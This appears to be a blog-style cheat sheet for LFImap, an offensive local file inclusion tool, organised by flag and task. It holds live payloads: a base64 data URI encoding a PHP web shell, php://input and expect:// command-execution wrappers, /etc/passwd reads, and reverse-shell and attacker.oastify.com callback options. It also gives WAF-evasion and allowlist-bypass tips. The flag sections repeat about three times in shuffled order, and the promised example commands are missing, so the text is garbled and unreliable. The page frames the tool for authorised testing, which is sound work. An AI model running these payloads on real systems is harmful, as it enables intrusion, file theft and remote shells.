A field-tested LFImap reference: target selection, traversal wordlists, PHP wrappers (filter/input/data/expect/file), command injection, RFI, log/proxy/cookie shaping, second-order requests, and the `PWN` placeholder. Grounded in the real argparse surface.
LFImap is the tool I reach for when I want to confirm and exploit a local file inclusion without hand-rolling every payload. It knows the standard PHP wrapper tricks, the traversal wordlists, and the OOB-callback chain, and it walks through them when you pass -a. This is the field reference for the flags that earn their keep, grouped by the task I am trying to accomplish.
Project status. Upstream LFImap is in pre-alpha; the README explicitly notes a 1.0 release is pending. The flag surface below is the one the current main branch ships, and short flags are uppercase (-U, -F, -R, -C, -D, -H, -M, -P), not lowercase. The injection-point placeholder is PWN (configurable with --placeholder).
Every flag organised by task. Copy and adapt. Based on the actual argparse surface in lfimap.py.
Target selection (short flags are UPPERCASE)
-U 'https://target.example/index.php?page=PWN'Single URL to test. Mark the injection point with the `PWN` placeholder (or use --placeholder to change the marker name).
-F urls.txtLoad multiple URLs to test from a file. One URL per line.
-R req.txtLoad a single raw HTTP request from a file. Method, headers, cookies, body preserved. Mark the injection point with `PWN`.
Request shaping
-C 'session=abc; PHPSESSID=xyz'HTTP session Cookie header. Required for any authenticated LFI endpoint.
-D 'page=PWN&lang=en'HTTP request FORM-data (POST body). Mark the injection point with `PWN`.
-H 'X-Forwarded-For: 127.0.0.1'Additional HTTP header (repeatable). Use for header-based injection points or to bypass IP allowlists.
-M POSTRequest method to use for testing. LFImap defaults to GET; override when the vulnerable endpoint only accepts POST or PUT.
-P http://127.0.0.1:8080Proxy to connect through. Burp default. Essential for inspecting what LFImap is actually sending.
--useragent 'Mozilla/5.0 ...'HTTP User-Agent header value (note: single word, no hyphen). The default LFImap UA is signatured by most WAFs.
--referer 'https://target.example/'HTTP Referer header value. Some apps gate functionality behind a same-origin Referer check.
--placeholder PWNCustom testing placeholder name. Default is `PWN`. Change it when `PWN` collides with literal content in your URL or body.
--delay 250Delay between requests, in milliseconds. Slow the run down to look human and avoid rate limits.
--max-timeout 30Seconds to wait for a response before giving up. Default 5. Bump on slow targets to avoid false negatives.
--http-ok '200,302'HTTP response codes to treat as valid. Custom non-200 success codes get LFImap to evaluate those responses too.
--force-sslForce HTTPS even if the target URL/request file is HTTP.
Attack techniques (each is its own flag)
-a(`--all`) Use ALL supported attack methods. Filter, input, data, expect, file wrappers; path traversal; RFI; command injection; heuristics. The kitchen sink. Best first pass on a confirmed-vulnerable parameter.
-f(`--filter`) Attack using the php://filter wrapper. Source disclosure via base64 encoding of PHP files.
-i(`--input`) Attack using the php://input wrapper. POST body becomes the included content; pair with allow_url_include=On for RCE.
-d(`--data`) Attack using the data:// wrapper. Inline PHP via a data URI; requires allow_url_include=On.
-e(`--expect`) Attack using the expect:// wrapper. Runs OS commands when the expect extension is enabled (rare in production).
-file(`--file`) Attack using the file:// wrapper. Direct local file inclusion via the file scheme.
-t(`--trunc`) Path traversal attack using a wordlist (default `short.txt`). Walks `../`, `..%2f`, `....//`, and common bypasses.
-r(`--rfi`) Remote file inclusion. Pair with --lhost/--lport or --callback to serve the remote payload.
-c(`--cmd`) Custom polyglot command injection probes. Useful when the parameter ends up in both an include and a shell context.
-heur(`--heuristics`) Heuristic checks: XSS, CRLF, open redirect, error-based info leak. Adjacent vulnerabilities the same parameter may carry.
PHP wrapper exploitation reference
php://filter/convert.base64-encode/resource=index.phpSource disclosure. Reads PHP files as base64 so the interpreter does not execute them. Driven by -f.
php://inputRaw POST body becomes the included content. LFImap flips the request to POST and sends PHP source as the body. Driven by -i.
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWzBdKTsgPz4=Inline PHP via a data URI. Requires allow_url_include=On. Driven by -d.
expect://idRuns OS commands via the expect wrapper. Only works when the expect extension is enabled. Driven by -e.
file:///etc/passwdDirect file inclusion via the file scheme. Driven by -file (the literal flag name).
Path traversal wordlist
-wT path/to/wordlist.txtPath to a custom wordlist for the path-traversal modality (`-t`). Defaults to `src/wordlists/short.txt`.
--use-longUse the bundled `src/wordlists/long.txt` wordlist instead of `short.txt`. Slower but covers more depths and bypass forms.
Payload options
-n UURL-encode payloads. Useful when the input is reflected unencoded into the include path.
-n BBase64-encode payloads. Pair with wrappers that decode base64 on the way in.
-q(`--quick`) Run with a reduced set of carefully-selected payloads. Faster first pass; lower coverage.
RCE via reverse shell (-x) and OOB callback
-x(`--exploit`) Once RCE is reached, exploit it by sending a reverse shell to --lhost / --lport. Requires -a or an explicit RCE-capable technique flag.
--lhost 10.0.0.5Local IP for the reverse-shell callback. The address the target reaches back to.
--lport 4444Local port for the reverse-shell callback.
--callback attacker.oastify.comOut-of-band callback hostname. Used for RFI and command-injection detection on blind targets, where the target's HTTP/DNS lookup confirms the chain fired.
CSRF handling (beta)
--csrf-url 'https://target.example/csrf'URL to visit before each test to fetch a fresh anti-CSRF token.
--csrf-method GETHTTP method for the CSRF-token fetch.
--csrf-param 'token'Name of the parameter holding the anti-CSRF token. LFImap extracts it from the response and injects it into the test request.
--csrf-data 'foo=bar'Body data to send when the CSRF page itself requires a POST.
Second-order (stored) request
--second-url 'https://target.example/render'URL where the stored payload is rendered. LFImap submits to -U/-R, then fetches --second-url to evaluate the result.
--second-method GETMethod for the second-order request. Default GET.
--second-data 'page=PWN'FORM-data body for the second-order request.
Output and verbosity
--log lfimap.logWrite all requests and responses to a file. The only output sink LFImap exposes.
-v(`--verbose`) Print more detailed output during attacks.
--no-stopDo not stop using the same technique after a finding. Run every payload in the technique even when an earlier one already succeeded; useful when you want the complete oracle.
Target selection (short flags are UPPERCASE)
-U 'https://target.example/index.php?page=PWN'Single URL to test. Mark the injection point with the `PWN` placeholder (or use --placeholder to change the marker name).
-F urls.txtLoad multiple URLs to test from a file. One URL per line.
-R req.txtLoad a single raw HTTP request from a file. Method, headers, cookies, body preserved. Mark the injection point with `PWN`.
Attack techniques (each is its own flag)
-a(`--all`) Use ALL supported attack methods. Filter, input, data, expect, file wrappers; path traversal; RFI; command injection; heuristics. The kitchen sink. Best first pass on a confirmed-vulnerable parameter.
-f(`--filter`) Attack using the php://filter wrapper. Source disclosure via base64 encoding of PHP files.
-i(`--input`) Attack using the php://input wrapper. POST body becomes the included content; pair with allow_url_include=On for RCE.
-d(`--data`) Attack using the data:// wrapper. Inline PHP via a data URI; requires allow_url_include=On.
-e(`--expect`) Attack using the expect:// wrapper. Runs OS commands when the expect extension is enabled (rare in production).
-file(`--file`) Attack using the file:// wrapper. Direct local file inclusion via the file scheme.
-t(`--trunc`) Path traversal attack using a wordlist (default `short.txt`). Walks `../`, `..%2f`, `....//`, and common bypasses.
-r(`--rfi`) Remote file inclusion. Pair with --lhost/--lport or --callback to serve the remote payload.
-c(`--cmd`) Custom polyglot command injection probes. Useful when the parameter ends up in both an include and a shell context.
-heur(`--heuristics`) Heuristic checks: XSS, CRLF, open redirect, error-based info leak. Adjacent vulnerabilities the same parameter may carry.
Path traversal wordlist
-wT path/to/wordlist.txtPath to a custom wordlist for the path-traversal modality (`-t`). Defaults to `src/wordlists/short.txt`.
--use-longUse the bundled `src/wordlists/long.txt` wordlist instead of `short.txt`. Slower but covers more depths and bypass forms.
Payload options
-n UURL-encode payloads. Useful when the input is reflected unencoded into the include path.
-n BBase64-encode payloads. Pair with wrappers that decode base64 on the way in.
-q(`--quick`) Run with a reduced set of carefully-selected payloads. Faster first pass; lower coverage.
CSRF handling (beta)
--csrf-url 'https://target.example/csrf'URL to visit before each test to fetch a fresh anti-CSRF token.
--csrf-method GETHTTP method for the CSRF-token fetch.
--csrf-param 'token'Name of the parameter holding the anti-CSRF token. LFImap extracts it from the response and injects it into the test request.
--csrf-data 'foo=bar'Body data to send when the CSRF page itself requires a POST.
Output and verbosity
--log lfimap.logWrite all requests and responses to a file. The only output sink LFImap exposes.
-v(`--verbose`) Print more detailed output during attacks.
--no-stopDo not stop using the same technique after a finding. Run every payload in the technique even when an earlier one already succeeded; useful when you want the complete oracle.
Request shaping
-C 'session=abc; PHPSESSID=xyz'HTTP session Cookie header. Required for any authenticated LFI endpoint.
-D 'page=PWN&lang=en'HTTP request FORM-data (POST body). Mark the injection point with `PWN`.
-H 'X-Forwarded-For: 127.0.0.1'Additional HTTP header (repeatable). Use for header-based injection points or to bypass IP allowlists.
-M POSTRequest method to use for testing. LFImap defaults to GET; override when the vulnerable endpoint only accepts POST or PUT.
-P http://127.0.0.1:8080Proxy to connect through. Burp default. Essential for inspecting what LFImap is actually sending.
--useragent 'Mozilla/5.0 ...'HTTP User-Agent header value (note: single word, no hyphen). The default LFImap UA is signatured by most WAFs.
--referer 'https://target.example/'HTTP Referer header value. Some apps gate functionality behind a same-origin Referer check.
--placeholder PWNCustom testing placeholder name. Default is `PWN`. Change it when `PWN` collides with literal content in your URL or body.
--delay 250Delay between requests, in milliseconds. Slow the run down to look human and avoid rate limits.
--max-timeout 30Seconds to wait for a response before giving up. Default 5. Bump on slow targets to avoid false negatives.
--http-ok '200,302'HTTP response codes to treat as valid. Custom non-200 success codes get LFImap to evaluate those responses too.
--force-sslForce HTTPS even if the target URL/request file is HTTP.
PHP wrapper exploitation reference
php://filter/convert.base64-encode/resource=index.phpSource disclosure. Reads PHP files as base64 so the interpreter does not execute them. Driven by -f.
php://inputRaw POST body becomes the included content. LFImap flips the request to POST and sends PHP source as the body. Driven by -i.
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWzBdKTsgPz4=Inline PHP via a data URI. Requires allow_url_include=On. Driven by -d.
expect://idRuns OS commands via the expect wrapper. Only works when the expect extension is enabled. Driven by -e.
file:///etc/passwdDirect file inclusion via the file scheme. Driven by -file (the literal flag name).
RCE via reverse shell (-x) and OOB callback
-x(`--exploit`) Once RCE is reached, exploit it by sending a reverse shell to --lhost / --lport. Requires -a or an explicit RCE-capable technique flag.
--lhost 10.0.0.5Local IP for the reverse-shell callback. The address the target reaches back to.
--lport 4444Local port for the reverse-shell callback.
--callback attacker.oastify.comOut-of-band callback hostname. Used for RFI and command-injection detection on blind targets, where the target's HTTP/DNS lookup confirms the chain fired.
Second-order (stored) request
--second-url 'https://target.example/render'URL where the stored payload is rendered. LFImap submits to -U/-R, then fetches --second-url to evaluate the result.
--second-method GETMethod for the second-order request. Default GET.
--second-data 'page=PWN'FORM-data body for the second-order request.
Target selection (short flags are UPPERCASE)
-U 'https://target.example/index.php?page=PWN'Single URL to test. Mark the injection point with the `PWN` placeholder (or use --placeholder to change the marker name).
-F urls.txtLoad multiple URLs to test from a file. One URL per line.
-R req.txtLoad a single raw HTTP request from a file. Method, headers, cookies, body preserved. Mark the injection point with `PWN`.
Attack techniques (each is its own flag)
-a(`--all`) Use ALL supported attack methods. Filter, input, data, expect, file wrappers; path traversal; RFI; command injection; heuristics. The kitchen sink. Best first pass on a confirmed-vulnerable parameter.
-f(`--filter`) Attack using the php://filter wrapper. Source disclosure via base64 encoding of PHP files.
-i(`--input`) Attack using the php://input wrapper. POST body becomes the included content; pair with allow_url_include=On for RCE.
-d(`--data`) Attack using the data:// wrapper. Inline PHP via a data URI; requires allow_url_include=On.
-e(`--expect`) Attack using the expect:// wrapper. Runs OS commands when the expect extension is enabled (rare in production).
-file(`--file`) Attack using the file:// wrapper. Direct local file inclusion via the file scheme.
-t(`--trunc`) Path traversal attack using a wordlist (default `short.txt`). Walks `../`, `..%2f`, `....//`, and common bypasses.
-r(`--rfi`) Remote file inclusion. Pair with --lhost/--lport or --callback to serve the remote payload.
-c(`--cmd`) Custom polyglot command injection probes. Useful when the parameter ends up in both an include and a shell context.
-heur(`--heuristics`) Heuristic checks: XSS, CRLF, open redirect, error-based info leak. Adjacent vulnerabilities the same parameter may carry.
Path traversal wordlist
-wT path/to/wordlist.txtPath to a custom wordlist for the path-traversal modality (`-t`). Defaults to `src/wordlists/short.txt`.
--use-longUse the bundled `src/wordlists/long.txt` wordlist instead of `short.txt`. Slower but covers more depths and bypass forms.
Payload options
-n UURL-encode payloads. Useful when the input is reflected unencoded into the include path.
-n BBase64-encode payloads. Pair with wrappers that decode base64 on the way in.
-q(`--quick`) Run with a reduced set of carefully-selected payloads. Faster first pass; lower coverage.
CSRF handling (beta)
--csrf-url 'https://target.example/csrf'URL to visit before each test to fetch a fresh anti-CSRF token.
--csrf-method GETHTTP method for the CSRF-token fetch.
--csrf-param 'token'Name of the parameter holding the anti-CSRF token. LFImap extracts it from the response and injects it into the test request.
--csrf-data 'foo=bar'Body data to send when the CSRF page itself requires a POST.
Output and verbosity
--log lfimap.logWrite all requests and responses to a file. The only output sink LFImap exposes.
-v(`--verbose`) Print more detailed output during attacks.
--no-stopDo not stop using the same technique after a finding. Run every payload in the technique even when an earlier one already succeeded; useful when you want the complete oracle.
Request shaping
-C 'session=abc; PHPSESSID=xyz'HTTP session Cookie header. Required for any authenticated LFI endpoint.
-D 'page=PWN&lang=en'HTTP request FORM-data (POST body). Mark the injection point with `PWN`.
-H 'X-Forwarded-For: 127.0.0.1'Additional HTTP header (repeatable). Use for header-based injection points or to bypass IP allowlists.
-M POSTRequest method to use for testing. LFImap defaults to GET; override when the vulnerable endpoint only accepts POST or PUT.
-P http://127.0.0.1:8080Proxy to connect through. Burp default. Essential for inspecting what LFImap is actually sending.
--useragent 'Mozilla/5.0 ...'HTTP User-Agent header value (note: single word, no hyphen). The default LFImap UA is signatured by most WAFs.
--referer 'https://target.example/'HTTP Referer header value. Some apps gate functionality behind a same-origin Referer check.
--placeholder PWNCustom testing placeholder name. Default is `PWN`. Change it when `PWN` collides with literal content in your URL or body.
--delay 250Delay between requests, in milliseconds. Slow the run down to look human and avoid rate limits.
--max-timeout 30Seconds to wait for a response before giving up. Default 5. Bump on slow targets to avoid false negatives.
--http-ok '200,302'HTTP response codes to treat as valid. Custom non-200 success codes get LFImap to evaluate those responses too.
--force-sslForce HTTPS even if the target URL/request file is HTTP.
PHP wrapper exploitation reference
php://filter/convert.base64-encode/resource=index.phpSource disclosure. Reads PHP files as base64 so the interpreter does not execute them. Driven by -f.
php://inputRaw POST body becomes the included content. LFImap flips the request to POST and sends PHP source as the body. Driven by -i.
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWzBdKTsgPz4=Inline PHP via a data URI. Requires allow_url_include=On. Driven by -d.
expect://idRuns OS commands via the expect wrapper. Only works when the expect extension is enabled. Driven by -e.
file:///etc/passwdDirect file inclusion via the file scheme. Driven by -file (the literal flag name).
RCE via reverse shell (-x) and OOB callback
-x(`--exploit`) Once RCE is reached, exploit it by sending a reverse shell to --lhost / --lport. Requires -a or an explicit RCE-capable technique flag.
--lhost 10.0.0.5Local IP for the reverse-shell callback. The address the target reaches back to.
--lport 4444Local port for the reverse-shell callback.
--callback attacker.oastify.comOut-of-band callback hostname. Used for RFI and command-injection detection on blind targets, where the target's HTTP/DNS lookup confirms the chain fired.
Second-order (stored) request
--second-url 'https://target.example/render'URL where the stored payload is rendered. LFImap submits to -U/-R, then fetches --second-url to evaluate the result.
--second-method GETMethod for the second-order request. Default GET.
--second-data 'page=PWN'FORM-data body for the second-order request.
Starting points I adapt from. Mark the injection point in your URL or body with PWN (the default placeholder) so LFImap knows where to substitute its payloads.
Try it with your own values
Tune the common flags once. Every command below reads from these. The Googlebot UA usually gets you hard-blocked faster than the default; pick it only when you know the target trusts crawlers.
First pass: run every attack technique against a confirmed parameter. This is what I run before reaching for anything more targeted:
The honest summary, since both tools come up in any LFI conversation.
LFImap is Python 3 native and biased toward fast detection plus the wrapper and OOB-callback chains. Its strength is breadth in one run: -a walks every technique flag and tells you what worked. It is what I reach for first.
LFISuite is older, Python 2 in its original form, with community-maintained Python 3 forks. Its strength is the interactive shell after exploitation: once it has a working include, it gives you a pseudo-terminal that hides the URL plumbing. If you have a confirmed LFI and want to run a sequence of commands without re-typing the payload boundary every time, the LFISuite shell is genuinely nicer to live in than driving raw includes by hand.
In practice I use LFImap for discovery and the first exploitation pass, and reach for LFISuite (or just a small wrapper script around curl) when I want a comfortable command loop on a confirmed shell. Neither one obviates writing the payloads by hand when something unusual is in the way.
Every flag above is dual use. The same -a that confirms a vulnerability in your own staging environment will exfiltrate /etc/passwd or drop a reverse shell on a production host you do not own. Use these against systems you own or are explicitly authorised to test. See the path traversal explainer for the underlying mechanics and the legal-framing notes there.
Sources
Authoritative references this article was fact-checked against.
Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.
A field-tested sqlmap reference: target specification, request shaping, detection tuning, DBMS fingerprinting, enumeration, dumping, file system access, OS command execution, evasion, and tamper scripts. Grouped by what you are actually trying to do.
A field-tested fuxploider reference: target shaping, true/false response detection, extension fuzzing, cookies and headers, proxying, threading, and what to do once a webshell uploads. Grounded in the real argparse surface.
